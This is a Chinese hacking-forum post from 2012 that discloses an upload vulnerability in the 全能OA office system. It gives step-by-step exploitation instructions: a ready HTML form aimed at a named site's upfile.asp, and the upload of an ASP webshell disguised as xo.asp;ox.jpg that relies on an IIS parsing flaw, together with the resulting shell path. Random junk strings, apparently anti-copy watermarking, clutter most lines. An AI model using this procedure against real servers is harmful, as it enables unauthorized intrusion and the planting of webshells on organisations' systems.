中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞# u/ C! Y' R, M8 h! h6 v
1 ]. L9 w: T+ J
系统介绍:
: C5 G/ I& I6 t( m2 a; W- Z1 p/ _0 L. S. |% ?+ j2 F3 h0 p$ H6 h* U
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
! z8 b4 Z* O% Z
, _2 W3 S+ p( {$ B0 t1 y主要功能:
3 U6 ?; Y- g0 G, H公司通告 / o5 y' |! s% _) R
工作计划 9 q+ Z# H- \. [6 y9 {, F- l
通讯助理
. c: g2 C/ f7 G, u. ]3 U4 D- ^, m# l& q& E客户资源
' [+ K4 E/ X7 }) l2 f我的公文 # |& h! K) U: z. K/ k- h
公文传阅
0 I: }8 D) P* V& k公共资源
' W, [8 M2 z3 A3 H7 k! K7 I" |资源预约 : s4 ]8 X+ p$ B# R( X
今日考勤
1 e% G" |2 X  f5 F" S个人计划 - A% V* ~" e5 J! [4 l" [! O$ f
个人通讯录 : u3 t2 b8 b8 n6 E
个人基本档案 / i2 b/ g: N7 q2 ?
未读邮件 ! X& w/ [* U/ i  O
发邮件 6 o- x3 r; q+ q% u, `8 V4 A
收件夹 - b# A$ ^! P+ |# \0 b
寄件夹
& n. R9 i  g2 E  Y0 X网络硬盘
' X) c# m4 J2 @( [2 l网络会议
& F  g! }; Q' h( S网络调查
' W: e, X; g/ c( r, j7 s1 r交流论坛
8 Y: ?: g& I. C% |- ]- ^
$ v/ t1 s6 \& C有兴趣测试的朋友可以下源码看看" ~, c0 Z9 P, O7 v
1 B/ F/ R3 n; T2 `, l' l
源码下载:3 ]( F( j8 o8 v( B  k

2 r. a9 p/ K% k* `, H5 Zhttp://www.mycodes.net/30/4750.htm
5 ?  f  E, V' ^4 c+ l9 ~6 A% R; `; g$ t% ~$ R/ R9 o; S, L
漏洞介绍:2 t. {" H1 h; _+ j- [6 |9 l" q! D

4 A) I. F! ?2 {由upfile.asp上传文件漏洞引起
" ?: D( U  ~+ h, u0 f% e( u. s7 O% a
6 s$ F3 X4 d' S" P测试方法:4 _. M& Z. n! p' v$ B
$ t/ }9 W  j# z! |- M: \: ~
使用名小子上传http://www.itlynn.com/upfile.asp即可5 {7 i, E; E8 d+ w6 l. `. g2 |1 u

1 c) B- s/ ]$ m; F如果upfile.asp文件被删除不存在。, a! W6 S" ?! N' p
# M0 R0 {, M. f) M& l+ |
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
/ L" _7 W6 s- r- g# W
3 `" f3 q& K' V7 g# {+ p如果存在那么将如下代码保存为upfile.html。* F! x5 _2 |- J# ^- \1 M

( ~: l7 L0 q( S  }( B& @然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
# M3 x$ q  Z1 b1 d8 H$ v5 S3 [( R- e, \5 ?
4 k  l) t- \" \* C4 J! T) k* p

0 C8 F5 X! C% }% V: h, g01 <table border='0' align="center" cellpadding="5"> / P5 S+ |7 I# t  _$ S# j

' y. u% B! m% X4 h02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 1 Z9 a5 ]. T9 J+ M' n" g
; ]9 [/ Q; F0 V1 r- j  X' U
03 <tr> ! c; Z8 x7 b* G2 C6 D, l9 K
: l0 E1 p" Q$ [" E* e
04             <td>报错:</td>
  J1 \( l- D$ J8 E5 F# n; d% M# P7 W5 P$ e
05             <td><input type='radio' name='errnumber' value='0'> " Z6 }5 `; u8 s$ {9 I3 Y6 f
+ M4 h  N- e0 h2 P+ E' l) g1 g+ h
06               自动更名 2 e' i+ e4 z& Z8 Q

0 ^5 v8 b8 g" C" u" K* E07               <input type='radio' name='errnumber' value='1' checked> 4 l1 J  _! d0 Q4 s
7 h" j  x" }4 S5 Y5 n5 E( Z
08               报错方式
) e9 n4 D2 b- q7 T2 Z! |/ x# v4 {( M+ A1 P+ d
09               <input type='radio' name='errnumber' value='2'> 0 F' h7 e3 M9 w3 A1 L

! A$ Q. M- a! l2 a+ k2 A, l* \* m10               直接覆盖</td> ! [/ x+ [: M& ^: ^% y( k  n
) q( Z' S0 [0 u8 X4 \# _6 M1 H$ S
11           </tr> : f2 r) g& m, C
0 {( E5 V% W: E4 o
12           <tr> 0 o) N( Z  u/ q/ D  ?$ j' N

- B6 Q# [; p  C6 j/ T13             <td>主题:</td>
# u0 H: W' J; E. M' g
+ L3 ^# O* b$ ?% `! V14             <td><input type='text' name='filename' size='30'></td>
3 x5 d7 \0 D1 F. @+ d* D, h4 t. {" I8 r" s. W: |+ e' O4 P
15           </tr>
- g" n  Z& C: L& m+ Y4 n% e' D: p' G' B& L2 b! M$ U; h  ]. z* Q
16           <tr>
/ s' w* {# B# F$ X5 Q( J
+ m0 X/ ]: V5 w17             <td>文件:</td>   Y& C  C- N+ w6 i* }
. ?* X/ l$ K  T$ j8 l
18             <td><input type="file"name="fruit"size="30"></td> * i: M4 b' f' Y+ ~$ P( B6 b0 h

( Y' t9 J: |- I% Z19           </tr>
4 a7 |7 k1 u( O- D
" C5 P6 ^3 f0 [+ r3 j# j' I20           <tr> 0 I0 i! V" q( C
) D! k) |  ^; d* t/ `2 U' L+ W
21             <td valign='top'>简介:</td>
7 Q7 S2 ?, d* X9 D5 |) w# w- `4 T8 g* d! s0 `1 [
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
3 T/ m9 P. R4 K+ v  n
8 H* s" {. P- b4 @6 ]9 {23           </tr> % a1 T$ O: s( ]0 K: [: n8 c& s

- D- Q$ W4 R& S7 w3 ]. l/ T24   & F0 i: \" P0 K! A. m* y

/ P, i3 ^: c* x3 y, u. Y) d25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> % `2 S9 b) l* V3 G+ `

* L& `$ R$ ]8 y, y! A' O) s26           </tr>
- i9 o0 g$ R  r9 r" D) ^% c% ?( ?3 b) e* d! b0 N
27         </form> % e. t. e( y; W' _2 c' G0 n; V/ B
3 e' {* c. e; c# ?6 Y" h
然后打开上传一个文件名为xo.asp;ox.jpg的文件。: @: a5 i5 l' X  P
3 A5 @5 e; Y% ^. ^- }

5 V% F# M+ `2 {- V1 h4 T7 y; d0 v) t/ S% C, Z+ ~" |
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg1 ^- ~' j; v9 e* }% d3 R8 O4 `
# y: F& H6 h1 ]- g/ v9 H
此漏洞需要配合解析漏洞利用。
: @0 u) t7 @; Q, `. U
1 ^' T# K3 x9 C/ N4 [! P# y




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2